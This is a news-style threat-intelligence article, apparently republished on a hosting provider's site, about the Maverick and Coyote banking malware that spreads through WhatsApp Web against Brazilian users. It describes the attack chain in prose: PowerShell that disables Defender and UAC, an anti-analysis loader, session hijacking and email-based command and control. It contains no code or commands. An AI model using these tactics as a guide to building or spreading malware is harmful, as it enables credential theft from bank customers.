Threat hunters have identified connections between a banking malware named Coyote and a newly emerging malware called Maverick, which is distributed through WhatsApp. According to a report by CyberProof, both forms of malware are developed in .NET, primarily target Brazilian users and financial institutions, and share similar functionalities, including decrypting and monitoring banking applications while spreading via WhatsApp Web.
Maverick was first reported by Trend Micro, which associated it with a threat actor known as Water Saci. This attack strategy uses two components: a self-propagating malware named SORVEPOTEL delivered via WhatsApp’s desktop version, containing a ZIP file with the Maverick payload.
This malware monitors browser tabs for URLs of financial institutions in Latin America. When it detects these URLs, it connects to a remote server to retrieve commands for collecting system information and deploying phishing pages to extract credentials.
Cybersecurity firm Sophos raised the possibility of Maverick’s connections to previous strategies related to Coyote, indicating that the new threat may be evolutionarily linked. Analysis by Kaspersky confirmed code similarities between Maverick and Coyote, although they consider Maverick a distinct threat impacting users in Brazil.
CyberProof’s findings reveal that the initial ZIP file includes a Windows shortcut which, when executed, uses cmd.exe or PowerShell to connect to an external server for downloading the malware. The PowerShell script is engineered to disable Microsoft Defender Antivirus and User Account Control (UAC), facilitating the retrieval of a .NET loader.
This loader features techniques designed to detect reverse engineering tools and will self-terminate if such tools are detected. It then downloads the main modules for SORVEPOTEL and Maverick, ensuring that the victim is located in Brazil by checking timezone and language settings.
Evidence also suggests the malware’s targeting has expanded to hotels in Brazil. The new campaign by Water Saci incorporates an email-based command-and-control (C2) system with advanced tactics for evading detection and targeting only Portuguese-speaking systems.
The malware includes a sophisticated command-and-control infrastructure for real-time management, which allows operators to pause, resume, and monitor the malware’s activities, effectively turning infected machines into a coordinated botnet.
A new dimension of the Water Saci campaign utilizes a Visual Basic Script (VB Script) to hijack WhatsApp browser sessions for distributing ZIP files. This technique bypasses authentication, granting immediate access to the victim’s WhatsApp account without raising alarms.
The malware then sends personalized messages to all contacts from the compromised account, utilizing harvested data such as cookies and authentication tokens to ensure a seamless operation without alerting users.
Additionally, SORVEPOTEL connects to specific email accounts to retrieve operational commands, even when secured with multi-factor authentication, which necessitates the threat actor to manually enter authentication codes—a practice that adds operational delays.
Overall, both Coyote and Maverick operate within a similar Brazilian cybercriminal ecosystem, marking an evolution in how banking trojans spread by exploiting legitimate platforms and profiles for covert operations.
Welcome to DediRock, your trusted partner in high-performance hosting solutions. At DediRock, we specialize in providing dedicated servers, VPS hosting, and cloud services tailored to meet the unique needs of businesses and individuals alike. Our mission is to deliver reliable, scalable, and secure hosting solutions that empower our clients to achieve their digital goals. With a commitment to exceptional customer support, cutting-edge technology, and robust infrastructure, DediRock stands out as a leader in the hosting industry. Join us and experience the difference that dedicated service and unwavering reliability can make for your online presence. Launch our website.